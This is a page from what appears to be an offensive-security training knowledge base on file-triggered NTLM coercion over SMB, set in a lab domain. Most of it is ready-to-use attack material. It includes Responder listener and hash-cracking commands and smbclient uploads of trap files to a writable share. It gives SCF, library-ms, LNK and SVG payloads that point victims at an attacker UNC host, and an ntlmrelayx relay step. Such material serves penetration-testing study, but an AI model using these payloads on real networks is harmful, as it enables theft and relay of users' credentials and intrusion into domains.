Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / SMB / Techniques

Coercion

File-triggered NTLM coercion abuses files that cause Windows Explorer or another client application to resolve a remote path. If we can place one of these files in a share or delivery location that a user browses or extracts, the client may authenticate to an attacker-controlled UNC path and expose NetNTLMv2 material.

The primitive is simple. We control a file. The file references \\attacker\share\resource. The victim browses, previews, extracts, or opens the file. Windows tries to retrieve the remote resource. The client authenticates to the attacker listener.

Listener

sudo responder -I eth0
sudo responder -I tun0

Responder loot

ls -la /usr/share/responder/logs/
cat /usr/share/responder/logs/*NTLMv2*.txt

Crack NetNTLMv2

hashcat -m 5600 /usr/share/responder/logs/*NTLMv2*.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt /usr/share/responder/logs/*NTLMv2*.txt

Place payload on writable SMB share

smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "put @Inventory.scf"
smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "put payload.library-ms"
smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "put report.pdf.lnk"

SCF trigger

[Shell]
Command=2
IconFile=\\10.10.10.100\share\legit.ico
[Taskbar]
Command=ToggleDesktop

Use a name that sorts early when testing share browsing behavior.

@Inventory.scf
@Quarterly.scf
@Readme.scf

Library-ms trigger

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Documents</name>
  <version>1</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\10.10.10.100\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

Package library-ms in a zip

zip upload.zip payload.library-ms

LNK trigger from Windows

$w = New-Object -ComObject WScript.Shell
$lnk = $w.CreateShortcut("C:\Users\Public\report.pdf.lnk")
$lnk.TargetPath = "\\10.10.10.100\share\document.pdf"
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Quarterly report"
$lnk.Save()

LNK trigger into a share

$w = New-Object -ComObject WScript.Shell
$lnk = $w.CreateShortcut("\\dc01.ootw.local\IT\report.pdf.lnk")
$lnk.TargetPath = "\\10.10.10.100\share\document.pdf"
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Save()

SVG remote reference

<svg xmlns="http://www.w3.org/2000/svg">
  <image href="\\10.10.10.100\share\icon.ico"/>
</svg>

Common trigger families

.library-ms
.searchConnector-ms
.lnk
.scf
.url
.svg
.html
Office documents with remote template or external resource references
Archive files containing one of the above

Use capture for cracking

sudo responder -I eth0
hashcat -m 5600 /usr/share/responder/logs/*NTLMv2*.txt /usr/share/wordlists/rockyou.txt

Use capture for relay

ntlmrelayx.py -tf smb-relay-targets.txt -smb2support

Then use a file trigger that makes the victim authenticate to the relay listener instead of only to Responder.

Cleanup

smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "del @Inventory.scf"
smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "del payload.library-ms"
smbclient //10.10.10.200/IT -U 'ootw.local\student%student' -c "del report.pdf.lnk"

Notes

This is user-interaction coercion. The file has to be browsed, previewed, extracted, indexed, or opened by something that follows the remote reference.

SCF behavior is version-dependent and does not work reliably on newer Windows Server builds. Treat it as one payload in the family, not the whole technique.

Do not run Responder and ntlmrelayx.py with competing SMB listeners on the same interface. Use one capture or relay plan at a time.